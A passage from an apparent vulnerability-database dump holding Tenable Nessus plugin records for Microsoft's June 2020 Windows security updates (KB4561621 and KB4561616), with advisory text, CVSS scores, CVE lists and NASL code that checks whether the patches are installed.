- An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)\");\n # https://support.microsoft.com/en-us/help/4561621/windows-10-update-kb4561621\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?89a45c0c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4561621.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1317\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561621'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17134',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561621])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T15:14:56", "description": "The remote Windows host is missing security update 4561616.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the way Windows Error Reporting (WER) handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1261, CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the way that the wlansvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector fail to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles a process crash. An attacker who successfully exploited this vulnerability could delete a targeted file leading to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in the way that the Connected Devices Platform Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when Windows Kernel fails to properly sanitize certain parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability. The security update addresses the vulnerability by ensuring the Diagnostics Hub Standard Collector Service properly handles file operations. (CVE-2020-1257, CVE-2020-1278, CVE-2020-1293)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. (CVE-2020-1300)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory. The vulnerability could corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations. An attacker who successfully exploited the vulnerability could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when Windows Host Guardian Service improperly handles hashes recorded and logged. An attacker who successfully exploited the vulnerability could tamper with the log file. In an attack scenario, an attacker can change existing event log types to a type the parsers do not interpret allowing an attacker to append their own hash without triggering an alert. The update addresses the vulnerability by correcting how Windows Host Guardian Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists when the Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1235, CVE-2020-1282, CVE-2020-1304, CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when Windows Lockscreen fails to properly load spotlight images from a secure location. An attacker who successfully exploited the vulnerability could execute commands with elevated permissions. An authenticated attacker could modify a registry value to exploit this vulnerability. The security update addresses the vulnerability by ensuring that the spotlight images are always loaded from a secure location. (CVE-2020-1279)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1316)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. The update addresses the vulnerability by correcting how Windows handles calls to preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when Component Object Model (COM) client uses special case IIDs. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1253, CVE-2020-1310)\n\n - A denial of service vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles objects in memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge (Chromium-based) in IE Mode improperly handles specific redirects. An attacker who successfully exploits the IE Mode vulnerability could trick a user into believing that the user was on a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1232)\n\n - An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this vulnerability could run arbitrary code in a privileged process. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1314)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "KB4561616: Windows 10 Version 1607 and Windows Server 2016 June 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0915", "CVE-2020-0916", "CVE-2020-0986", "CVE-2020-1073", "CVE-2020-1160", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1197", "CVE-2020-1202", "CVE-2020-1203", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1211", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1219", "CVE-2020-1220", "CVE-2020-1230", "CVE-2020-1231", "CVE-2020-1232", "CVE-2020-1234", "CVE-2020-1235", "CVE-2020-1236", "CVE-2020-1239", "CVE-2020-1241", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1257", "CVE-2020-1259", "CVE-2020-1260", "CVE-2020-1261", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1269", "CVE-2020-1270", "CVE-2020-1271", "CVE-2020-1272", "CVE-2020-1278", "CVE-2020-1279", "CVE-2020-1281", "CVE-2020-1282", "CVE-2020-1283", "CVE-2020-1287", "CVE-2020-1291", "CVE-2020-1293", "CVE-2020-1294", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1304", "CVE-2020-1305", "CVE-2020-1309", "CVE-2020-1310", "CVE-2020-1311", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1316", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1348"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561616.NASL", "href": "https://www.tenable.com/plugins/nessus/137258", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137258);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1073\",\n \"CVE-2020-1160\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1211\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1232\",\n \"CVE-2020-1234\",\n \"CVE-2020-1235\",\n \"CVE-2020-1236\",\n \"CVE-2020-1239\",\n \"CVE-2020-1241\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1257\",\n \"CVE-2020-1259\",\n \"CVE-2020-1260\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1266\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1278\",\n \"CVE-2020-1279\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1283\",\n \"CVE-2020-1287\",\n \"CVE-2020-1291\",\n \"CVE-2020-1293\",\n \"CVE-2020-1294\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n \"CVE-2020-1305\",\n \"CVE-2020-1309\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561616\");\n script_xref(name:\"MSFT\", value:\"MS20-4561616\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0248-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0256-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0051\");\n\n script_name(english:\"KB4561616: Windows 10 Version 1607 and Windows Server 2016 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561616.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1235, CVE-2020-1282,\n CVE-2020-1304, CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1316)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; 